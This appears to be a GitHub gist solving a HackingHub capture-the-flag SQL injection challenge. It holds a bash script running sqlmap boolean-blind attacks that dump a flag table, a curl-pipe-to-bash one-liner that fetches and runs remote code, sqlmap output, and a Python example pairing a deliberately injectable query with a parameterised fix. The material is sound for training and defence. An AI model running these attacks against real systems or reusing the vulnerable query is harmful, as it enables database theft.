@richardevcom
Last active September 3, 2024 00:40
HackingHub - Capture flag in "Boolean Based SQL Injection" challenge using SQLMap
#!/bin/bash
# Challenge: https://app.hackinghub.io/hubs/interactive-sqli-boolean
apt update
apt install -y sqlmap
# Provide injectable URL for this script
# URL="https://dc9zxy0y.eu2.ctfio.com/api/checkuser?username=adam" && curl -sL https://gist.githubusercontent.com/richardevcom/8ecfe76937db4d761bdb203d28c25ebc/raw | bash -s -- "$URL"
URL=$1
# --technique=B restricts sqlmap to boolean-based blind tests;
# --not-string marks a response containing "taken":false as the false case.
# "$URL" is quoted so the shell does not split or glob the query string.
sqlmap -u "$URL" \
--dbms=mysql --technique=B --level=5 --risk=3 --not-string="\"taken\":false" \
--dump -D sqli_three -T flag -C flag --batch

richardevcom commented Sep 3, 2024

Challenge: Boolean Based SQL Injection

  1. Launch hub;
  2. Open hub URL (mine was https://dc9zxy0y.eu2.ctfio.com);
  3. Append /api/checkuser?username=adam to the URL;
  4. Run the command below (change URL to your injection URL of the hub):
    URL="https://dc9zxy0y.eu2.ctfio.com/api/checkuser?username=adam" && curl -sL https://gist.githubusercontent.com/richardevcom/8ecfe76937db4d761bdb203d28c25ebc/raw | bash -s -- "$URL"
    will return:
[...]
[03:35:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.22.0
back-end DBMS: MySQL >= 8.0.0
[03:35:04] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'sqli_three'
[03:35:04] [INFO] fetching number of column(s) 'flag' entries for table 'flag' in database 'sqli_three'
[03:35:04] [INFO] resumed: 1
[03:35:04] [INFO] resumed: FLAG{s63gvi}
Database: sqli_three
Table: flag
[1 entry]
+--------------+
| flag         |
+--------------+
| FLAG{s63gvi} |
+--------------+
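
Why the `"taken":false` response works as a true/false oracle for `--technique=B`, and the fix, shown as an added example (not the gist author's or the challenge's code). The handler names, the `users` schema, the SQLite stand-in for the MySQL back end and the test inputs are assumptions constructed for illustration.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the back end (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY)")
    db.executemany("INSERT INTO users VALUES (?)", [("adam",), ("eve",)])
    return db

def checkuser_vulnerable(db, username):
    # Vulnerable: the parameter is spliced into the SQL text, so a quote in it
    # changes the WHERE clause and "taken" reports a caller-chosen condition.
    sql = "SELECT 1 FROM users WHERE username = '" + username + "' LIMIT 1"
    return {"taken": db.execute(sql).fetchone() is not None}

def checkuser_hardened(db, username):
    # Hardened: the value is bound as a parameter, so it is only ever compared
    # as data and cannot alter the structure of the statement.
    sql = "SELECT 1 FROM users WHERE username = ? LIMIT 1"
    return {"taken": db.execute(sql, (username,)).fetchone() is not None}

def has_boolean_oracle(check, db):
    """Regression check: two unknown usernames that differ only in an embedded
    boolean condition must produce the same response."""
    true_case = "nobody' OR '1'='1"   # constructed test input
    false_case = "nobody' OR '1'='2"  # constructed test input
    return check(db, true_case) != check(db, false_case)

if __name__ == "__main__":
    db = make_db()
    for check in (checkuser_vulnerable, checkuser_hardened):
        print(check.__name__,
              "| adam ->", check(db, "adam"),
              "| boolean oracle:", has_boolean_oracle(check, db))
```

With the bound parameter both test inputs return `{"taken": False}`, so the response no longer carries any information about the embedded condition.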
